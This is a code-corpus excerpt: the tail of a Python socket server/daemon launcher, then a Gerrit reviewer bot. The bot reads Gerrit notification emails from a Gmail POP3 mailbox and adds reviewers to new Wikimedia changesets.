#level = getattr(logging, args.log_level.upper())
#log.setLevel(level)
if args.client:
client1(port=args.port if args.port else int(open(args.portfile).read()), hostname=args.hostname)
sys.exit(0)
if not args.port:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',0)) # pick a free port
args.port = s.getsockname()[1]
del s
if args.portfile:
open(args.portfile,'w').write(str(args.port))
pidfile = os.path.abspath(args.pidfile) if args.pidfile else ''
logfile = os.path.abspath(args.logfile) if args.logfile else ''
if logfile:
LOGFILE = logfile
open(LOGFILE, 'w') # for now we clear it on restart...
log("setting logfile to %s"%LOGFILE)
main = lambda: run_server(port=args.port, host=args.host, pidfile=pidfile)
if args.daemon and args.pidfile:
import daemon
daemon.daemonize(args.pidfile)
main()
else:
main()
| gpl-3.0 | -7,304,380,971,359,334,000 | 38.188223 | 247 | 0.563432 | false |
valhallasw/gerrit-reviewer-bot | pop3bot.py | 1 | 4056 | import sys
import poplib
import email.parser
import logging
import traceback
from email.message import Message
from typing import Iterable, Dict, Tuple
import gerrit_rest
from add_reviewer import ReviewerFactory, add_reviewers
logger = logging.getLogger('pop3bot')
def mkmailbox(debug=0):
import config
username = config.username
password = config.password
mailbox = poplib.POP3_SSL('pop.googlemail.com', '995')
mailbox.set_debuglevel(debug)
mailbox.user(username)
mailbox.pass_(password)
return mailbox
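# mkmailbox expects a local config module; a minimal sketch of it (values are
# placeholders, not real credentials):
#
#   # config.py
#   username = 'bot@example.com'
#   password = 'app-specific-password'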
def mail_generator(mailbox) -> Iterable[bytes]:
    """ Fetches the raw contents of each mail (as bytes) via TOP,
        yields those and DELEtes them before the next mail is fetched """
nmails, octets = mailbox.stat()
for i in range(1, nmails + 1):
        # use TOP rather than RETR; gmail (sometimes?) interprets RETR'd
        # messages as read and does not report them again (sigh)
yield b"\n".join(mailbox.top(i, 1000)[1])
mailbox.dele(i)
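# Note: mailbox.top(i, 1000) returns (response, list_of_line_bytes, octets);
# joining the line list with b"\n" reconstructs the raw RFC 2822 message,
# which email.parser.BytesParser can parse downstream.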
def message_generator(emails: Iterable[bytes]) -> Iterable[Tuple[Message, str]]:
p = email.parser.BytesParser()
for mail in emails:
mail = p.parsebytes(mail)
# if mail is multipart-mime (probably not from gerrit)
# mail.get_payload() is a list rather than a string
# and mail.get_payload(decode=True) returns None
m = mail
while isinstance(m.get_payload(), list):
m = m.get_payload()[0]
yield mail, m.get_payload(decode=True).decode('utf-8', 'replace')
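# Example of why the while-loop above is needed (illustrative): for a
# multipart/alternative mail, mail.get_payload() is a list of sub-Messages,
# so we descend into payload[0] until we reach a leaf part whose payload is
# the actual text body.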
def gerritmail_generator(generator: Iterable[Tuple[Message, str]]) -> Iterable[Dict[str, str]]:
for message, contents in generator:
mi = dict(list(message.items()))
subject = mi.get('Subject', 'Unknown')
sender = mi.get('From', 'Unknown')
gerrit_data = {}
for (header, value) in message.items():
if header.startswith("X-Gerrit"):
gerrit_data[header] = value
for line in contents.split("\n"):
if line.startswith("Gerrit-") and ": " in line:
k, v = line.split(": ", 1)
gerrit_data[k] = v
print(subject, sender, gerrit_data.get('X-Gerrit-Change-Id'))
if gerrit_data:
yield gerrit_data
else:
print("Skipping; Contents: ")
print(contents)
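# A yielded gerrit_data dict might look like this (values invented for
# illustration):
#   {'X-Gerrit-MessageType': 'newchange',
#    'X-Gerrit-Change-Id': 'I0123abcd...',
#    'X-Gerrit-Commit': 'deadbeef...',
#    'Gerrit-PatchSet': '1'}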
def new_changeset_generator(g: gerrit_rest.GerritREST, mail_generator: Iterable[Dict[str, str]]) -> Iterable[Dict]:
for mail in mail_generator:
mt = mail.get('X-Gerrit-MessageType', '')
ps = mail.get('Gerrit-PatchSet', '')
commit = mail['X-Gerrit-Commit']
if mt != 'newchange':
print("skipping message (%s)" % mt)
continue
if ps != '1':
print("skipping PS%s" % ps)
continue
print("(getting ", commit, ")")
matchingchange = g.get_changeset(commit)
if matchingchange:
yield matchingchange
else:
print("Could not find matching change for %s" % commit)
def main():
g = gerrit_rest.GerritREST('https://gerrit.wikimedia.org/r')
RF = ReviewerFactory()
mailbox = mkmailbox(0)
nmails, octets = mailbox.stat()
print("%i e-mails to process (%i kB)" % (nmails, octets / 1024))
try:
emails = mail_generator(mailbox)
messages = message_generator(emails)
gerritmails = gerritmail_generator(messages)
changesets = new_changeset_generator(g, gerritmails)
for j, changeset in enumerate(changesets):
try:
reviewers = RF.get_reviewers_for_changeset(changeset)
add_reviewers(changeset['id'], reviewers)
except Exception:
sys.stdout.write(repr(changeset) + "\n caused exception:")
traceback.print_exc()
sys.stderr.write(repr(changeset) + "\n caused exception:")
raise
finally:
        # flush successfully processed emails
mailbox.quit()
if __name__ == "__main__":
main()
| mit | 453,748,591,061,692,100 | 30.2 | 115 | 0.603797 | false |